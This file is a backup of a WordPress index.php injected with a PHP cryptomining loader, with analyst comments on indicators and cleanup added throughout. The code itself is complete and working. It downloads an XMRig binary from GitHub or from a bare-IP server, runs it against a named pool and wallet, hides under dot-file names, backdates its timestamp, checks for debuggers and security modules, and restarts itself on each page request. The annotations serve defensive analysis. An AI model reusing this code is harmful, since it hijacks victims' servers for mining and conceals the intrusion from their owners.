File: /home/o/b/s/obstpeq/www/index.php.bak-20260306-002613
<?php
// Analyst note: the injected code first silences PHP for this request.
// Error reporting, on-screen errors and PHP error logging are all switched off,
// so failures inside this script leave no trace in the PHP error log. Triage has
// to rely on web access logs, process telemetry and file-integrity data instead.
@error_reporting(0);
@ini_set('display_errors', 0);
@ini_set('log_errors', 0);
// Removes the execution time limit and keeps the script running after the client
// disconnects, so the download/launch logic below is not cut short by the request.
@set_time_limit(0);
@ignore_user_abort(true);
// Payload sources, tried in this order by downloadMiner(): two XMRig release
// tarballs hosted on GitHub, then a plain-HTTP URL on a bare IP address.
// Network indicators: outbound requests from the PHP worker to these URLs.
// The first two are release assets of a public project, so only the third is
// specific to this sample.
$MINER_URLS = [
"https://github.com/xmrig/xmrig/releases/download/v6.24.0/xmrig-6.24.0-linux-static-x64.tar.gz",
"https://github.com/xmrig/xmrig/releases/download/v6.23.0/xmrig-6.23.0-linux-static-x64.tar.gz",
"http://188.132.197.157/isyy"
];
// Mining pool settings that are interpolated into the process command line
// ($MINER_CMD). 'url' is the pool host:port to look for in egress logs; 'user'
// is passed as --user (presumably the operator's wallet address - confirm);
// 'pass' is passed as --pass.
$POOL_CONFIG = [
'url' => 'pool.hashvault.pro:443',
'user' => '48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7',
'pass' => 'webb'
];
/**
 * Select the directory where the payload binary and its state files are written.
 *
 * Candidates are checked in order: the script's own directory, the system temp
 * directory, /tmp, /var/tmp, PHP's upload_tmp_dir and the document root. The
 * first one that exists and is writable wins; if none qualifies, the script's
 * own directory is returned anyway.
 *
 * Defender note: because the script directory is first, the artifacts land in
 * the web root whenever the PHP user can write there. A web root that is not
 * writable by the PHP user pushes them to the temp locations listed here.
 *
 * @return string Directory path with any trailing slash removed by rtrim().
 */
function getWorkDir() {
$dirs = [
__DIR__,
sys_get_temp_dir(),
'/tmp',
'/var/tmp',
ini_get('upload_tmp_dir'),
$_SERVER['DOCUMENT_ROOT'] ?? __DIR__
];
foreach ($dirs as $dir) {
// empty() skips blank candidates (for example an unset upload_tmp_dir).
if (!empty($dir) && is_dir($dir) && is_writable($dir)) {
return rtrim($dir, '/');
}
}
// Fallback is returned without any writability check.
return __DIR__;
}
/**
 * Return one of five hard-coded dot-prefixed file names, chosen with array_rand().
 *
 * The result is used as the on-disk name of the payload binary. Hunting hint:
 * search the directories listed in getWorkDir() for files with these names
 * (and the same names with a ".tar.gz" suffix, see downloadMiner()).
 *
 * @return string One of the names in $names.
 */
function getRandomName() {
$names = ['.sys_cache', '.phpinfo', '.config_cache', '.session_tmp', '.apache_tmp'];
return $names[array_rand($names)];
}
// Paths are recomputed on every execution of this file. getRandomName() is
// called here each time, so $MINER_FILE can name a different file from one
// request to the next; check for all five candidate names during cleanup.
$WORK_DIR = getWorkDir();
$MINER_FILE = $WORK_DIR . '/' . getRandomName();
// Lock and hash file names are ".lock_" / ".hash_" plus the first 8 hex
// characters of md5($WORK_DIR). They are deterministic per directory, so a
// responder can compute the expected file names for each candidate directory.
$LOCK_FILE = $WORK_DIR . '/.lock_' . substr(md5($WORK_DIR), 0, 8);
$HASH_FILE = $WORK_DIR . '/.hash_' . substr(md5($WORK_DIR), 0, 8);
// Full command line for the payload. The pool host, the --user value and the
// --pass value appear verbatim in the process arguments, which makes the
// running process identifiable from a process listing.
$MINER_CMD = $MINER_FILE . " --url {$POOL_CONFIG['url']} --user {$POOL_CONFIG['user']} --pass {$POOL_CONFIG['pass']} --max-cpu-usage 60 -B";
/**
 * Report which PHP capabilities are present on the host.
 *
 * Returns a map of capability name to bool built from function_exists() checks
 * on the process-execution functions, cURL, fopen and file_get_contents.
 *
 * Analyst note: no call to this function appears in this file, and the
 * $required/$available lists built at the top are never read afterwards.
 *
 * @return array Map of capability name => bool.
 */
function checkPHPFunctions() {
$required = ['file_get_contents', 'file_put_contents', 'chmod'];
$available = [];
foreach ($required as $func) {
if (function_exists($func)) {
$available[] = $func;
}
}
return [
'shell_exec' => function_exists('shell_exec'),
'exec' => function_exists('exec'),
'system' => function_exists('system'),
'passthru' => function_exists('passthru'),
'popen' => function_exists('popen'),
'proc_open' => function_exists('proc_open'),
'curl' => function_exists('curl_init'),
'fopen' => function_exists('fopen'),
'file_get_contents' => function_exists('file_get_contents')
];
}
/**
 * Fetch $url and write it to $dest, trying five transfer methods in turn.
 *
 * Order: PHP cURL, file_get_contents(), fopen() streaming, the wget command
 * via shell_exec(), the fetch command via exec(). The first method that
 * leaves more than 1000 bytes wins.
 *
 * Detection notes:
 *  - TLS certificate and host-name verification are disabled in the cURL and
 *    stream-context paths, so an intercepting proxy will not make the
 *    transfer fail.
 *  - Both in-process paths send a hard-coded desktop-browser User-Agent; that
 *    string coming from a server-side PHP worker is a usable proxy/egress
 *    log signature.
 *  - The last two paths spawn wget / fetch as children of the web server
 *    user, which process telemetry can alert on.
 *
 * @param string $url  Remote location to download.
 * @param string $dest Local path the content is written to.
 * @return string|false Name of the method that succeeded, or false.
 */
function downloadFile($url, $dest) {
$methods = ['curl', 'file_get_contents', 'fopen', 'wget', 'fetch'];
foreach ($methods as $method) {
$result = false;
switch($method) {
case 'curl':
if (function_exists('curl_init')) {
$ch = @curl_init($url);
if ($ch) {
@curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
@curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
// Certificate and host-name checks are turned off for this transfer.
@curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
@curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
@curl_setopt($ch, CURLOPT_TIMEOUT, 60);
@curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
$data = @curl_exec($ch);
@curl_close($ch);
// Responses of 1000 bytes or fewer are treated as a failed download.
if ($data && strlen($data) > 1000) {
@file_put_contents($dest, $data);
$result = true;
}
}
}
break;
case 'file_get_contents':
// Only attempted when allow_url_fopen is enabled in the PHP configuration.
if (function_exists('file_get_contents') && ini_get('allow_url_fopen')) {
$context = @stream_context_create([
'http' => [
'timeout' => 60,
'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
'follow_location' => 1
],
'ssl' => [
'verify_peer' => false,
'verify_peer_name' => false
]
]);
$data = @file_get_contents($url, false, $context);
if ($data && strlen($data) > 1000) {
@file_put_contents($dest, $data);
$result = true;
}
}
break;
case 'fopen':
// Streaming copy in 8192-byte reads; also gated on allow_url_fopen.
// No stream context is passed here, unlike the file_get_contents path.
if (function_exists('fopen') && ini_get('allow_url_fopen')) {
$src = @fopen($url, 'rb');
if ($src) {
$dst = @fopen($dest, 'wb');
if ($dst) {
while (!feof($src)) {
@fwrite($dst, @fread($src, 8192));
}
@fclose($dst);
@fclose($src);
if (file_exists($dest) && filesize($dest) > 1000) {
$result = true;
}
}
}
}
break;
case 'wget':
// External wget process; both arguments go through escapeshellarg().
if (function_exists('shell_exec')) {
@shell_exec("wget -q -O " . escapeshellarg($dest) . " " . escapeshellarg($url) . " 2>&1");
if (file_exists($dest) && filesize($dest) > 1000) {
$result = true;
}
}
break;
case 'fetch':
// External fetch process (presumably the BSD fetch utility - confirm on the host).
if (function_exists('exec')) {
@exec("fetch -q -o " . escapeshellarg($dest) . " " . escapeshellarg($url) . " 2>&1");
if (file_exists($dest) && filesize($dest) > 1000) {
$result = true;
}
}
break;
}
if ($result) {
return $method;
}
}
return false;
}
/**
 * Unpack a downloaded tarball and copy the "xmrig" binary inside it to $destFile.
 *
 * Methods are tried in the order given by $methods (tar_php, tar_cmd, phar),
 * which differs from the order of the case labels below. Each method extracts
 * into a fresh directory named "x_" plus 8 hex characters under
 * sys_get_temp_dir(), locates a file called "xmrig", copies it to $destFile
 * and sets mode 0755. On success the tarball itself is deleted.
 *
 * Forensic notes:
 *  - The temporary directory is removed only through shell_exec("rm -rf ...").
 *    Where that call does not run, the x_<hex> directory and its extracted
 *    contents stay behind in the temp directory and are worth looking for.
 *  - The 'phar' method also writes a copy of the tarball at "<tarFile>.tar".
 *  - Exceptions from PharData are swallowed by empty catch blocks.
 *
 * @param string $tarFile  Path of the downloaded .tar.gz archive.
 * @param string $destFile Path the extracted binary is copied to.
 * @return string|false Name of the method that succeeded, or false.
 */
function extractTarGz($tarFile, $destFile) {
$methods = ['tar_php', 'tar_cmd', 'phar'];
foreach ($methods as $method) {
$result = false;
switch($method) {
case 'tar_cmd':
// Extraction with the system tar command, run from inside the temp directory.
if (function_exists('shell_exec')) {
$tmpDir = sys_get_temp_dir() . '/x_' . substr(md5(uniqid()), 0, 8);
@mkdir($tmpDir, 0755, true);
$cmd = "cd " . escapeshellarg($tmpDir) . " && tar -xzf " . escapeshellarg($tarFile) . " 2>&1";
@shell_exec($cmd);
// Expected locations of the binary inside the unpacked archive.
$patterns = [
$tmpDir . '/xmrig-*/xmrig',
$tmpDir . '/xmrig',
$tmpDir . '/*/xmrig'
];
foreach ($patterns as $pattern) {
$files = glob($pattern);
if (!empty($files) && file_exists($files[0])) {
@copy($files[0], $destFile);
@chmod($destFile, 0755);
$result = true;
break;
}
}
@shell_exec("rm -rf " . escapeshellarg($tmpDir));
}
break;
case 'tar_php':
// In-process extraction with PharData; no child process is needed for the unpack itself.
if (class_exists('PharData')) {
try {
$tmpDir = sys_get_temp_dir() . '/x_' . substr(md5(uniqid()), 0, 8);
@mkdir($tmpDir, 0755, true);
$phar = new PharData($tarFile);
$phar->extractTo($tmpDir);
$patterns = [
$tmpDir . '/xmrig-*/xmrig',
$tmpDir . '/xmrig',
$tmpDir . '/*/xmrig'
];
foreach ($patterns as $pattern) {
$files = glob($pattern);
if (!empty($files) && file_exists($files[0])) {
@copy($files[0], $destFile);
@chmod($destFile, 0755);
$result = true;
break;
}
}
// Cleanup still goes through shell_exec, without a function_exists() check.
@shell_exec("rm -rf " . escapeshellarg($tmpDir));
} catch (Exception $e) {}
}
break;
case 'phar':
// Variant that copies the archive to "<tarFile>.tar" first and then walks the
// extracted tree recursively for a file named exactly "xmrig".
if (class_exists('Phar')) {
try {
$tmpFile = $tarFile . '.tar';
@copy($tarFile, $tmpFile);
$phar = new PharData($tmpFile);
$tmpDir = sys_get_temp_dir() . '/x_' . substr(md5(uniqid()), 0, 8);
@mkdir($tmpDir, 0755, true);
$phar->extractTo($tmpDir);
$iterator = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($tmpDir),
RecursiveIteratorIterator::SELF_FIRST
);
foreach ($iterator as $file) {
if ($file->isFile() && $file->getFilename() === 'xmrig') {
@copy($file->getPathname(), $destFile);
@chmod($destFile, 0755);
$result = true;
break;
}
}
@unlink($tmpFile);
@shell_exec("rm -rf " . escapeshellarg($tmpDir));
} catch (Exception $e) {}
}
break;
}
if ($result) {
// The downloaded archive is removed once the binary has been copied out.
@unlink($tarFile);
return $method;
}
}
return false;
}
/**
 * Return the MD5 of the payload file at $MINER_FILE, or false if it is absent.
 *
 * The value is used only for the script's own change detection (see
 * isFileCorrupted()); it is not a verification against a publisher checksum.
 *
 * @return string|false Hex MD5 digest, or false when the file does not exist.
 */
function getMinerHash() {
global $MINER_FILE;
if (file_exists($MINER_FILE)) {
return md5_file($MINER_FILE);
}
return false;
}
/**
 * Persist the payload's MD5 to $HASH_FILE (the ".hash_<8 hex>" file in the
 * work directory). Write errors are suppressed.
 *
 * Forensic note: the content of this file is the MD5 of the binary that was
 * dropped, which can be recovered even if the binary was later removed.
 *
 * @param string $hash Digest to store.
 */
function saveHash($hash) {
global $HASH_FILE;
@file_put_contents($HASH_FILE, $hash);
}
/**
 * Decide whether the payload on disk has to be replaced.
 *
 * Returns true when $MINER_FILE is missing, unreadable, smaller than 1000
 * bytes, cannot be made executable, or no longer matches the MD5 stored in
 * $HASH_FILE.
 *
 * Remediation note: deleting, truncating or altering only the binary makes
 * this return true, and the callers then download it again on the next
 * request. The injected PHP has to be removed before (or together with) the
 * dropped files.
 *
 * @return bool True if the file is considered unusable.
 */
function isFileCorrupted() {
global $MINER_FILE, $HASH_FILE;
if (!file_exists($MINER_FILE)) return true;
if (!is_readable($MINER_FILE)) return true;
if (@filesize($MINER_FILE) < 1000) return true;
if (function_exists('is_executable')) {
if (!@is_executable($MINER_FILE)) {
// One attempt to restore the execute bit before giving up.
@chmod($MINER_FILE, 0755);
if (!@is_executable($MINER_FILE)) return true;
}
}
if (file_exists($HASH_FILE)) {
$oldHash = trim(@file_get_contents($HASH_FILE));
$newHash = getMinerHash();
// A mismatch is reported only when both digests are non-empty.
if ($oldHash && $newHash && $oldHash !== $newHash) {
return true;
}
}
return false;
}
/**
 * Obtain the payload from the first working entry in $MINER_URLS.
 *
 * URLs containing ".tar.gz" are saved as "<MINER_FILE>.tar.gz" and unpacked
 * with extractTarGz(); any other URL is written directly to $MINER_FILE and
 * made executable. After a successful drop the file's MD5 is stored through
 * saveHash().
 *
 * Forensic note: the non-archive URL delivers a file that is executed as-is,
 * so its content is whatever that server returned at the time; the stored
 * hash file is the only record of it in this script.
 *
 * @return bool True once a file larger than 1000 bytes exists at $MINER_FILE.
 */
function downloadMiner() {
global $MINER_URLS, $MINER_FILE;
foreach ($MINER_URLS as $url) {
$isTarGz = (strpos($url, '.tar.gz') !== false);
$downloadFile = $isTarGz ? $MINER_FILE . '.tar.gz' : $MINER_FILE;
$method = downloadFile($url, $downloadFile);
if ($method) {
if ($isTarGz) {
$extractMethod = extractTarGz($downloadFile, $MINER_FILE);
if (!$extractMethod) {
// Extraction failed: drop the archive and move on to the next URL.
@unlink($downloadFile);
continue;
}
} else {
@chmod($MINER_FILE, 0755);
}
if (file_exists($MINER_FILE) && filesize($MINER_FILE) > 1000) {
$hash = getMinerHash();
if ($hash) {
saveHash($hash);
}
return true;
}
}
}
return false;
}
/**
 * Check whether a process matching the payload's file name is running.
 *
 * Runs pgrep -f, "ps aux | grep" and pidof against basename($MINER_FILE),
 * through shell_exec() when it exists and otherwise through exec(). Any
 * non-empty output counts as "running".
 *
 * Detection note: each page request that reaches this code spawns these
 * process-listing commands as children of the web server user, which is
 * unusual for a PHP application and visible in process telemetry.
 *
 * @return bool True if any of the commands produced output.
 */
function isMinerRunning() {
global $MINER_FILE;
$basename = basename($MINER_FILE);
$methods = [
'pgrep' => "pgrep -f " . escapeshellarg($basename),
'ps' => "ps aux | grep " . escapeshellarg($basename) . " | grep -v grep",
'pidof' => "pidof " . escapeshellarg($basename)
];
foreach ($methods as $cmd) {
if (function_exists('shell_exec')) {
$output = @shell_exec($cmd);
if (!empty(trim($output))) {
return true;
}
} elseif (function_exists('exec')) {
$output = [];
@exec($cmd, $output);
if (!empty($output)) {
return true;
}
}
}
return false;
}
/**
 * Make the injected file blend in and flush PHP code caches.
 *
 * Sets this file's mode to 0644 and rewrites its timestamp to a random point
 * 10 to 90 days in the past, then resets OPcache and the APC cache when those
 * functions exist.
 *
 * Forensic note: the modification time of this file is therefore not
 * evidence of when the injection happened. Compare the file against a
 * known-good copy or core checksums (for WordPress, e.g. `wp core
 * verify-checksums`), and prefer the inode change time, which touch() does
 * not let the caller choose - verify on the affected filesystem.
 */
function selfProtect() {
$currentFile = __FILE__;
if (file_exists($currentFile)) {
@chmod($currentFile, 0644);
// Backdates the file by 10-90 days (86400 seconds per day).
@touch($currentFile, time() - (86400 * rand(10, 90)));
}
if (function_exists('opcache_reset')) {
@opcache_reset();
}
if (function_exists('apc_clear_cache')) {
@apc_clear_cache();
}
}
/**
 * Environment check that decides whether the payload logic runs at all.
 *
 * Returns false when pgrep finds a running process named strace, gdb, ltrace,
 * tcpdump, wireshark or tshark, or when apache_get_modules() lists
 * mod_security, mod_security2 or mod_evasive. Returns true otherwise.
 *
 * Analyst note: when this returns false the caller only loads the normal
 * WordPress page and exits, so a host observed with one of these tools
 * running shows none of the download or process activity. Absence of that
 * activity during live analysis does not mean the file is clean; static
 * review of the file content is the reliable check.
 *
 * @return bool True if none of the listed tools or modules was detected.
 */
function antiDebug() {
$suspicious = ['strace', 'gdb', 'ltrace', 'tcpdump', 'wireshark', 'tshark'];
foreach ($suspicious as $tool) {
if (function_exists('shell_exec')) {
// $tool comes only from the hard-coded list above.
$result = @shell_exec("pgrep -x $tool 2>&1");
if (!empty(trim($result))) {
return false;
}
}
}
if (function_exists('apache_get_modules')) {
$modules = @apache_get_modules();
if (is_array($modules)) {
$blocked = ['mod_security', 'mod_security2', 'mod_evasive'];
foreach ($blocked as $mod) {
if (in_array($mod, $modules)) {
return false;
}
}
}
}
return true;
}
/**
 * Kill the payload process and delete the dropped files, then end the request.
 *
 * Sends SIGKILL by name via pkill and killall (when shell_exec exists) and
 * unlinks the binary, the lock file, the hash file and the leftover
 * "<MINER_FILE>.tar.gz". The injected PHP file itself is not removed here.
 *
 * Analyst note: no call to this function appears in this file. The list of
 * paths it deletes doubles as a checklist of on-disk artifacts for cleanup.
 */
function selfDestruct() {
global $MINER_FILE, $LOCK_FILE, $HASH_FILE;
$basename = basename($MINER_FILE);
if (function_exists('shell_exec')) {
@shell_exec("pkill -9 -f " . escapeshellarg($basename) . " 2>&1");
@shell_exec("killall -9 " . escapeshellarg($basename) . " 2>&1");
}
@unlink($MINER_FILE);
@unlink($LOCK_FILE);
@unlink($HASH_FILE);
@unlink($MINER_FILE . '.tar.gz');
exit;
}
/**
 * Report whether a previous request already started the payload.
 *
 * True only when the lock file exists and isMinerRunning() confirms a
 * matching process. A lock file without a matching process is deleted and
 * false is returned, so the caller goes through the start path again.
 *
 * @return bool True if the lock file is present and the process is running.
 */
function isAlreadyInitialized() {
global $LOCK_FILE;
if (file_exists($LOCK_FILE)) {
if (isMinerRunning()) {
return true;
} else {
@unlink($LOCK_FILE);
return false;
}
}
return false;
}
/**
 * Write the current Unix timestamp to the lock file.
 *
 * Forensic note: the lock file's content is the time() value of the request
 * that last confirmed the process as running, which gives a timeline data
 * point independent of file timestamps.
 */
function setInitialized() {
global $LOCK_FILE;
@file_put_contents($LOCK_FILE, time());
}
/**
 * Remove the lock file when it exists but no matching process is running.
 *
 * @return bool True if a stale lock file was found and an unlink was attempted.
 */
function cleanLockIfDead() {
global $LOCK_FILE;
if (file_exists($LOCK_FILE) && !isMinerRunning()) {
@unlink($LOCK_FILE);
return true;
}
return false;
}
/**
 * Ensure the payload is on disk and launch it in the background.
 *
 * Re-downloads the binary if isFileCorrupted() says so, sets mode 0755, then
 * tries four launch variants in order: nohup through shell_exec(), a plain
 * backgrounded shell_exec(), exec() and system(). After each attempt it
 * sleeps 3 seconds and checks isMinerRunning(); on success the lock file is
 * written.
 *
 * Defender notes:
 *  - Every launch path depends on shell_exec, exec or system. With those
 *    three unavailable to PHP (for example through disable_functions), this
 *    function has no way to start the process.
 *  - A long-lived child of the web server user started with output sent to
 *    /dev/null, and whose arguments contain the pool host from $MINER_CMD,
 *    is the main process-level indicator.
 *  - Each failed attempt adds a 3-second sleep, so affected pages may show
 *    unexplained latency in access logs.
 *
 * @return bool True if a matching process is running after a launch attempt.
 */
function startMiner() {
global $MINER_CMD, $MINER_FILE;
if (isFileCorrupted()) {
@unlink($MINER_FILE);
if (!downloadMiner()) {
return false;
}
}
@chmod($MINER_FILE, 0755);
$methods = [
'nohup_shell' => "nohup $MINER_CMD > /dev/null 2>&1 &",
'shell_bg' => "$MINER_CMD > /dev/null 2>&1 &",
'exec' => $MINER_CMD,
'system' => $MINER_CMD
];
foreach ($methods as $type => $cmd) {
if ($type === 'nohup_shell' || $type === 'shell_bg') {
if (function_exists('shell_exec')) {
@shell_exec($cmd);
sleep(3);
if (isMinerRunning()) {
setInitialized();
return true;
}
}
} elseif ($type === 'exec') {
// The redirect and background suffix are appended at call time for exec/system.
if (function_exists('exec')) {
@exec($cmd . ' > /dev/null 2>&1 &');
sleep(3);
if (isMinerRunning()) {
setInitialized();
return true;
}
}
} elseif ($type === 'system') {
if (function_exists('system')) {
@system($cmd . ' > /dev/null 2>&1 &');
sleep(3);
if (isMinerRunning()) {
setInitialized();
return true;
}
}
}
}
return false;
}
// Main flow. This runs on every request that executes this file.
//
// Step 1: if antiDebug() reports an analysis tool or one of the listed Apache
// modules, behave like an unmodified WordPress index.php and stop.
if (!antiDebug()) {
if (file_exists(dirname(__FILE__) . '/wp-blog-header.php')) {
define('WP_USE_THEMES', true);
require dirname(__FILE__) . '/wp-blog-header.php';
}
exit;
}
// Step 2: backdate this file and clear code caches, then drop a stale lock.
selfProtect();
cleanLockIfDead();
// Step 3: persistence by page view. If the process is already running, only
// repair a missing or changed binary; otherwise download and start it. A
// visitor request is the trigger each time - no cron entry or service is
// created by this file - so killing the process without restoring index.php
// lasts only until the next request.
if (isAlreadyInitialized()) {
if (isFileCorrupted()) {
$basename = basename($MINER_FILE);
if (function_exists('shell_exec')) {
@shell_exec("pkill -9 -f " . escapeshellarg($basename) . " 2>&1");
}
@unlink($LOCK_FILE);
downloadMiner();
startMiner();
}
} else {
if (isFileCorrupted() || !file_exists($MINER_FILE)) {
downloadMiner();
}
if (!isMinerRunning()) {
startMiner();
} else {
setInitialized();
}
}
// Step 4: hand over to WordPress so the site renders normally for the visitor.
// These last lines are the only part that matches a stock WordPress index.php;
// everything above them is injected. Remediation order: restore this file from
// a known-good source, stop the running process, remove the dropped binary,
// ".lock_*", ".hash_*", "*.tar.gz" and "x_*" temp artifacts, then investigate
// how the file was modified (the entry point is not visible in this file).
if (file_exists(dirname(__FILE__) . '/wp-blog-header.php')) {
define('WP_USE_THEMES', true);
require dirname(__FILE__) . '/wp-blog-header.php';
}